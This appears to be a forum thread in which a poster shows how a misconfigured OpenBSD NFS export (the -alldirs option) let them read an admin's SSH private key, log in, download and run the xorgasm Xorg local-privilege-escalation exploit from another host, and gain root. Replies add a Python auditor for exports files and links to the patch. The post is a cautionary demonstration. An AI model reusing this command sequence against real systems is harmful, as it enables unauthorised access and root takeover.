Security Professionals - ipfw add deny all from eindgebruikers to any

OpenBSD NFS server

31-10-2018, 14:56 by yobi, 4 replies
Set up an OpenBSD NFS server using the following instructions (top Google result):
https://nixingaround.blogspot.com/2017/02/nfs-server-on-openbsd.html

With the alldirs option!! See: https://man.openbsd.org/exports.5 (BUGS section)

And then the following can happen:

root@kali:~# showmount -e 192.168.1.127
Export list for 192.168.1.127:
/home/admin/storage (everyone)
root@kali:~# mount -tnfs 192.168.1.127:/home /mnt
root@kali:~# cd /mnt
root@kali:/mnt# ls
admin
root@kali:/mnt# cd admin
root@kali:/mnt/admin# ls
storage
root@kali:/mnt/admin# cd .ssh
root@kali:/mnt/admin/.ssh# ls
authorized_keys id_rsa id_rsa.pub
root@kali:/mnt/admin/.ssh#

And then....
https://www.exploit-db.com/exploits/45742/

root@kali:~/OpenBSD64# ssh admin@192.168.1.127 -i id_rsa
The authenticity of host '192.168.1.127 (192.168.1.127)' can't be established.
ECDSA key fingerprint is SHA256:ubmXXNW0/cj46Jj8Jal31GFKizwxl6Rs9rg4kxxutK4.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.127' (ECDSA) to the list of known hosts.
Last login: Wed Oct 31 14:25:59 2018
OpenBSD 6.4 (GENERIC) #349: Thu Oct 11 13:25:13 MDT 2018

Welcome to OpenBSD: The proactively secure Unix-like operating system.

Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code. With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.

OpenBSD64$ ls
storage
OpenBSD64$ id
uid=1000(admin) gid=1000(admin) groups=1000(admin), 0(wheel)
OpenBSD64$ ftp http://192.168.1.222/openbsd64.txt
Trying 192.168.1.222...
Requesting http://192.168.1.222/openbsd64.txt
100% |**************************************************| 2488 00:00
2488 bytes received in 0.00 seconds (5.85 MB/s)
OpenBSD64$ mv openbsd64.txt openbsd64.sh
OpenBSD64$ chmod 755 openbsd64.sh
OpenBSD64$ ./openbsd64.sh
raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron
Copyright (c) 2018 Marco Ivaldi <raptor@0xdeadbeef.info>

X.Org X Server 1.19.6
Release Date: 2017-12-20
X Protocol Version 11, Revision 0
Build Operating System: OpenBSD 6.4 amd64
Current Operating System: OpenBSD OpenBSD64.lan 6.4 GENERIC#349 amd64
Build Date: 11 October 2018 01:50:08PM

Current version of pixman: 0.34.0
Before reporting problems, check http://wiki.x.org
to make sure that you have the latest version.
Markers: (--) probed, (**) from config file, (==) default setting,
(++) from command line, (!!) notice, (II) informational,
(WW) warning, (EE) error, (NI) not implemented, (??) unknown.
(++) Log file: "crontab", Time: Wed Oct 31 15:35:27 2018
(==) Using system config directory "/usr/X11R6/share/X11/xorg.conf.d"
mtrr set e0000000 1000000 failed: Device not configured
_FontTransOpen: Unable to Parse address * * * * * root /tmp/xorgasm

Be patient for a couple of minutes...

(II) Server terminated successfully (0). Closing log file.

Don't forget to cleanup and run crontab -e to reload the crontab.
-rw-r--r-- 1 root wheel 47321 Oct 31 15:35 /etc/crontab
-rwsrwxrwx 1 root wheel 7417 Oct 31 15:37 /usr/local/bin/pwned
OpenBSD64# id
uid=0(root) gid=0(wheel) groups=1000(admin), 0(wheel)
OpenBSD64#

So don't just blindly copy instructions!!
Replies (4)
31-10-2018, 15:06 by jennifer
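The session above works because -alldirs, as the exports(5) BUGS section warns, lets a client mount any directory on the filesystem that holds the export, not just the exported directory, and because the export carries no host restriction. The following is an added example, not code from the post or from the linked blog: a small auditor for the OpenBSD exports(5) line syntax (directories, then -options, then hosts or netgroups) that flags -alldirs, exports with no host or -network restriction, and -maproot to uid 0, and rebuilds an offending line in restricted form. The sample exports content and the client address 192.168.1.10 are constructed for the demo; the exact line the blog uses is not reproduced here.

```python
"""Audit an exports(5) file for the mistakes exploited in the post.

Added example, not from the original post or the linked blog. Parses the
OpenBSD exports(5) line syntax and reports three things a reviewer should
never let pass: -alldirs, an export with no host restriction, and
-maproot to uid 0. The sample file below is constructed for the demo.
"""
import shlex

# Constructed sample: the first line mirrors the weak setup from the post,
# the others show restricted alternatives.
SAMPLE_EXPORTS = """\
# weak: -alldirs lets a client mount *any* directory on the filesystem
# holding /home/admin/storage, e.g. /home itself (see exports(5), BUGS)
/home/admin/storage -alldirs -mapall=admin
# restricted: only the listed host may mount, and only this directory
/home/admin/storage -mapall=admin 192.168.1.10
# restricted to a network, but -maproot=root hands remote root local root
/data/backup -maproot=root -network=192.168.1 -mask=255.255.255.0
"""


def parse_exports(text):
    """Return a list of (dirs, opts, hosts) for each non-comment line.

    exports(5): one or more directories, then -options, then host names
    or netgroups. Options are kept in file order in a dict; a bare flag
    such as -alldirs is stored with the value True.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        dirs, opts, hosts = [], {}, []
        for tok in shlex.split(line):
            if tok.startswith("-"):
                key, _, val = tok.partition("=")
                opts[key] = val if val else True
            elif tok.startswith("/") and not opts and not hosts:
                dirs.append(tok)
            else:
                hosts.append(tok)
        entries.append((dirs, opts, hosts))
    return entries


def _restricted(opts, hosts):
    """An entry is restricted if it names hosts or carries -network."""
    return bool(hosts) or "-network" in opts


def audit_exports(text):
    """Return (directory, severity, message) findings for every export."""
    findings = []
    for dirs, opts, hosts in parse_exports(text):
        for d in dirs:
            if "-alldirs" in opts:
                findings.append((d, "HIGH",
                                 "-alldirs: any directory on the filesystem "
                                 f"containing {d} can be mounted, not just {d}"))
            if not _restricted(opts, hosts):
                findings.append((d, "HIGH",
                                 "no host or -network restriction: "
                                 "exported to everyone"))
            if opts.get("-maproot") in ("root", "0"):
                findings.append((d, "MEDIUM",
                                 "-maproot=root: remote uid 0 becomes local root"))
    return findings


def harden_entry(dirs, opts, hosts, allowed):
    """Rebuild one exports line without -alldirs and with an explicit client list.

    -maproot=root is dropped so mountd falls back to its default of mapping
    remote root to the anonymous uid. `allowed` (constructed here) is the
    client list the admin intends; an entry that is already restricted keeps
    its own hosts or -network.
    """
    parts = list(dirs)
    for key, val in opts.items():
        if key == "-alldirs":
            continue
        if key == "-maproot" and val in ("root", "0"):
            continue
        parts.append(key if val is True else f"{key}={val}")
    parts.extend(hosts if _restricted(opts, hosts) else allowed)
    return " ".join(parts)


if __name__ == "__main__":
    for d, sev, msg in audit_exports(SAMPLE_EXPORTS):
        print(f"{sev:6} {d}: {msg}")
    print("--- hardened ---")
    for entry in parse_exports(SAMPLE_EXPORTS):
        print(harden_entry(*entry, allowed=["192.168.1.10"]))
```

Run it against a copy of /etc/exports from the server (`python3 audit_exports.py < /dev/null` after replacing SAMPLE_EXPORTS with the file contents, or import `audit_exports` and feed it `open("/etc/exports").read()`). The fix the auditor proposes is the minimum: dropping -alldirs and naming the clients. If subdirectories really must be mountable separately, put the exported tree on its own filesystem so -alldirs cannot reach /home/admin/.ssh, and remember that mountd(8) must be reloaded before a changed exports file takes effect.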
Your message is something many people in IT often fail to realize: you can only trust how "something" works once you actually know what it does and how it does it.

Nice show, by the way!
31-10-2018, 18:03 by Anonymous
Easy-to-exploit privilege escalation bug bites OpenBSD and other big name OSes
The 23-month-old flaw can be exploited by untrusted users with just three commands.

Dan Goodin - Oct 26, 2018

https://arstechnica.com/information-technology/2018/10/x-org-bug-that-gives-attackers-root-bites-openbsd-and-other-big-name-oses/

OpenBSD #0day Xorg LPE via CVE-2018-14665 can be triggered from a remote SSH session, does not need to be on a local console. An attacker can literally take over impacted systems with 3 commands or less.
31-10-2018, 21:46 by Anonymous
And had you actually applied the patches? (This hole has already been patched!)

http://www.openbsd.org/errata64.html
01-11-2018, 10:39 by Anonymous
Quite the textbook example of someone who doesn't have their administration in order. It became known on the 25th and was patched on the 25th (!).
This thread is locked. Replies are no longer possible.